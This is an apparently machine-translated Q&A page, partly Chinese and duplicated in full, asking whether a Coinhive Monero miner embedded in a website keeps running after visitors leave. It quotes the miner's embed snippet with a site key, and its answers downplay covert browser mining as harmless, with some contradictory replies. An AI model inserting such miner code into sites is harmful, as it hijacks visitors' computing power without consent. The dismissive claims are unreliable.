带有比特币矿工脚本的站点
Site with a bitcoin miner script
我发现我的一些用户访问了一个网站,该网站的代码中似乎有一个比特币挖掘 JS 脚本:
<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>
我的问题是,即使用户离开该页面,他们是否仍会受到感染?这些程序是否仅在用户在浏览器中打开页面时才有效?
with this are the users still infected even if they navigate away from
the page?
没有
Do these sort of programs only work while the user has the page open
in the browser?
是的,当页面在浏览器中打开时,该脚本只会 运行 在包含它的网站上
升级:
有关此脚本的更多信息:https://coin-hive.com/
Coinhive offers a JavaScript miner for the Monero Blockchain (...) that you can embed in your website. Your users run the miner directly in their Browser
和https://coin-hive.com/documentation/miner
The miner runs until you explicitely stop it again or the user
navigates away.
Coinhive 似乎不是 "malware",因为它似乎不会对用户的计算机造成特别有害的影响。如果是这样的话,用户的计算机永远不会 "infected" 有任何东西。
如今,网站在后台加载大量第三方脚本和 cookie 并在您每次使用互联网时执行数百种您不知道的事情是非常普遍的。大多数网站在您访问它们时都会加载 Google 分析跟踪脚本,即使您没有授权它们这样做。但这不会被视为恶意软件。大多数网站都会加载持久性第三方 cookie,这些 cookie 会跟踪您从一个网站到另一个网站的状态,并创建一个关于您在线习惯的大量档案。这就是为什么您可能在一个网站上购买鞋子,然后突然发现 Facebook 正在为您投放鞋子广告。但这通常也不被视为恶意软件。
就"harm"或"unwanted activity"而言,持久跟踪可以说比硬币挖掘脚本更具侵入性。硬币挖掘脚本可能只是使用了最终用户计算机的一些内存和 CPU 能力,这与在您不知情的情况下在后台加载的数百个其他 javascript 库没有什么不同.
我不熟悉coin-hive服务,但实际上你提供的脚本包含这样几行:
var JobThread = function() {
this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
this.worker.onmessage = this.onReady.bind(this);
...
};
如您所见,它正在使用 Workers。我没有研究整个脚本,但无论如何使用 web workers 意味着即使在页面关闭后某些操作也可以 运行 。 post.
中的更多信息
所以你的问题的第一个答案是肯定的,用户可能会在页面关闭后的一段时间内被感染(理论上,如果脚本是这样写的) .
但实际上脚本似乎很快就会被系统本身终止。此外,coin-hive 平台未被定位为恶意软件,对用户系统来说应该是安全的。
我认为您根本不必为此担心。
我发现我的一些用户访问了一个网站,该网站的代码中似乎有一个比特币挖掘 JS 脚本:
<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>
我的问题是,即使用户离开该页面,他们是否仍会受到感染?这些程序是否仅在用户在浏览器中打开页面时才有效?
with this are the users still infected even if they navigate away from the page?
没有
Do these sort of programs only work while the user has the page open in the browser?
是的,当页面在浏览器中打开时,该脚本只会 运行 在包含它的网站上
升级:
有关此脚本的更多信息:https://coin-hive.com/
Coinhive offers a JavaScript miner for the Monero Blockchain (...) that you can embed in your website. Your users run the miner directly in their Browser
和https://coin-hive.com/documentation/miner
The miner runs until you explicitely stop it again or the user navigates away.
Coinhive 似乎不是 "malware",因为它似乎不会对用户的计算机造成特别有害的影响。如果是这样的话,用户的计算机永远不会 "infected" 有任何东西。
如今,网站在后台加载大量第三方脚本和 cookie 并在您每次使用互联网时执行数百种您不知道的事情是非常普遍的。大多数网站在您访问它们时都会加载 Google 分析跟踪脚本,即使您没有授权它们这样做。但这不会被视为恶意软件。大多数网站都会加载持久性第三方 cookie,这些 cookie 会跟踪您从一个网站到另一个网站的状态,并创建一个关于您在线习惯的大量档案。这就是为什么您可能在一个网站上购买鞋子,然后突然发现 Facebook 正在为您投放鞋子广告。但这通常也不被视为恶意软件。
就"harm"或"unwanted activity"而言,持久跟踪可以说比硬币挖掘脚本更具侵入性。硬币挖掘脚本可能只是使用了最终用户计算机的一些内存和 CPU 能力,这与在您不知情的情况下在后台加载的数百个其他 javascript 库没有什么不同.
我不熟悉coin-hive服务,但实际上你提供的脚本包含这样几行:
var JobThread = function() {
this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
this.worker.onmessage = this.onReady.bind(this);
...
};
如您所见,它正在使用 Workers。我没有研究整个脚本,但无论如何使用 web workers 意味着即使在页面关闭后某些操作也可以 运行 。 post.
中的更多信息所以你的问题的第一个答案是肯定的,用户可能会在页面关闭后的一段时间内被感染(理论上,如果脚本是这样写的) .
但实际上脚本似乎很快就会被系统本身终止。此外,coin-hive 平台未被定位为恶意软件,对用户系统来说应该是安全的。 我认为您根本不必为此担心。